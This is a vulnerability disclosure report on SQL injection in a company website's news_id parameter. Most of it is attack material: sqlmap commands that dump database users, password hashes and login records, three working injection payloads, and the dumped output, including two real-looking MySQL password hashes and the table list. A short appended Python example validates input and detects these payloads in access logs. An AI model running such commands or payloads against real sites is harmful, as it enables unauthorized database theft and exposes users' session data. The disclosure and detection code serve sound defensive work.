2015-11-03: Details reported to the vendor, awaiting vendor handling
2015-11-04: Vendor has confirmed; details disclosed to the vendor only
2015-11-14: Details disclosed to core white hats and relevant domain experts
2015-11-24: Details disclosed to regular white hats
2015-12-04: Details disclosed to intern white hats
2015-12-19: Details disclosed to the public
A SQL injection vulnerability exists in one location of 海港錦鯉集團 (rdsadmin password leaked / 55 tables / 220,000 users' IP addresses and session IDs leaked)
Address: http://**.**.**.**/news_details.php?news_id=121
python sqlmap.py -u "http://**.**.**.**/news_details.php?news_id=121" -p news_id --technique=BTU --random-agent --batch --users --passwords
python sqlmap.py -u "http://**.**.**.**/news_details.php?news_id=121" -p news_id --technique=BTU --random-agent --batch -D koi_db -T user_login -C ipaddress,logintime,username,usession_id --start 1 --stop 100 --dump
back-end DBMS: MySQL 5.0.12
Database: koi_db
+------------+---------+
| Table      | Entries |
+------------+---------+
| user_login | 225089  |
+------------+---------+
---
Parameter: news_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: news_id=121 AND 8135=8135

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: news_id=121 AND (SELECT * FROM (SELECT(SLEEP(5)))HFsw)

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: news_id=-4801 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a7a6b71,0x594b7562794f75535954476745476e645a426950726276454c417869484e666470536a56436b5848,0x71786b6271),NULL,NULL-- -
---
web server operating system: Linux Ubuntu 13.04 or 12.04 or 12.10 (Raring Ringtail or Precise Pangolin or Quantal Quetzal)
web application technology: PHP 5.3.10, Apache 2.2.22
back-end DBMS: MySQL 5.0.12
database management system users [2]:
[*] 'koidbuser'@'%'
[*] 'rdsadmin'@'localhost'

database management system users password hashes:
[*] koidbuser [1]:
    password hash: *B4424A0597FD6459C51B530FDC8831BF925CEFAF
[*] rdsadmin [1]:
    password hash: *3F809E3C7A7660DFADEC1A097315F38B7F26576E

available databases [8]:
[*] information_schema
[*] innodb
[*] koi_db
[*] koishop
[*] mysql
[*] pennydb
[*] performance_schema
[*] tmp

Database: koi_db
[55 tables]
+---------------------------+
| activation                |
| address_name              |
| address_province          |
| adv                       |
| alipay                    |
| anwser                    |
| banner                    |
| banner_old                |
| banner_tmp                |
| banner_tmp_old            |
| bid                       |
| bid_action                |
| bid_image                 |
| bid_temp                  |
| bid_title                 |
| bid_title_old             |
| calendar                  |
| category                  |
| diary                     |
| edm_campaign              |
| game                      |
| game_content              |
| game_score                |
| game_score_content        |
| gift                      |
| gift_action               |
| internal_photo            |
| internal_photo_content    |
| knowledge                 |
| location                  |
| mem_temp                  |
| member                    |
| news                      |
| paypal_bid                |
| paypal_cart_info          |
| paypal_payment_info       |
| point_history             |
| product                   |
| product_image             |
| question                  |
| salesorder                |
| salesorder_items          |
| sc_main                   |
| sc_users                  |
| sms_verify                |
| staff                     |
| table_forum               |
| table_log                 |
| user_login                |
| votevideo                 |
| votevideo_title           |
| votevideo_type            |
| votevideoact              |
| votevideoact_bak_20131129 |
| votevideoact_bak_20141229 |
+---------------------------+

Database: koi_db
Table: user_login
[4 columns]
+-------------+--------------+
| Column      | Type         |
+-------------+--------------+
| ipaddress   | varchar(50)  |
| logintime   | datetime     |
| username    | varchar(255) |
| usession_id | varchar(100) |
+-------------+--------------+
The first 100 users were selected for the dump.
Deploy a WAF.
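As an added example (my code, not part of the original report or the vendor's application), the Python below pairs the root-cause control that a WAF does not replace, rejecting any news_id that is not a plain integer before it can reach the query, with a log check that flags the three payload shapes sqlmap reported here (boolean-based, SLEEP-based, UNION). The access-log lines and the regular expressions are constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Signatures for the three techniques sqlmap reported against news_id.
# Written for this example; they are not sqlmap's or the vendor's rules.
SIGNATURES = {
    "boolean-blind": re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I),
    "time-blind": re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
    "union": re.compile(r"\bunion\b.*\bselect\b", re.I | re.S),
}

def validate_news_id(raw):
    """Root-cause control: news_id must be a plain positive integer, so it can be bound as an int."""
    return raw is not None and re.fullmatch(r"[1-9]\d{0,8}", raw) is not None

def classify_request(url):
    """Signature names matching the news_id parameter of a request; [] means it validated cleanly."""
    hits = []
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    for value in query.get("news_id", []):
        if validate_news_id(value):
            continue
        matched = [name for name, rx in SIGNATURES.items() if rx.search(value)]
        hits.extend(matched or ["non-numeric"])
    return hits

# Constructed Apache combined-log lines (sample data, not taken from the report).
SAMPLE_LOG = """\
203.0.113.5 - - [03/Nov/2015:10:00:01 +0800] "GET /news_details.php?news_id=121 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [03/Nov/2015:10:00:02 +0800] "GET /news_details.php?news_id=121%20AND%208135=8135 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [03/Nov/2015:10:00:03 +0800] "GET /news_details.php?news_id=121%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))HFsw) HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [03/Nov/2015:10:00:09 +0800] "GET /news_details.php?news_id=-4801%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL--%20- HTTP/1.1" 200 4800 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')

def scan_log(text):
    """Return (client_ip, timestamp, request, signatures) for each line whose news_id fails validation."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            ip, ts, request = m.groups()
            hits = classify_request(request)
            if hits:
                findings.append((ip, ts, request, hits))
    return findings
```

Feeding real access logs through scan_log gives a quick retrospective view of when probing of news_id started, while validate_news_id is the check the PHP handler itself should apply.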
Severity: High
Vulnerability Rank: 12
Confirmed: 2015-11-04 17:47
The incident has been reported to the relevant organization.
None yet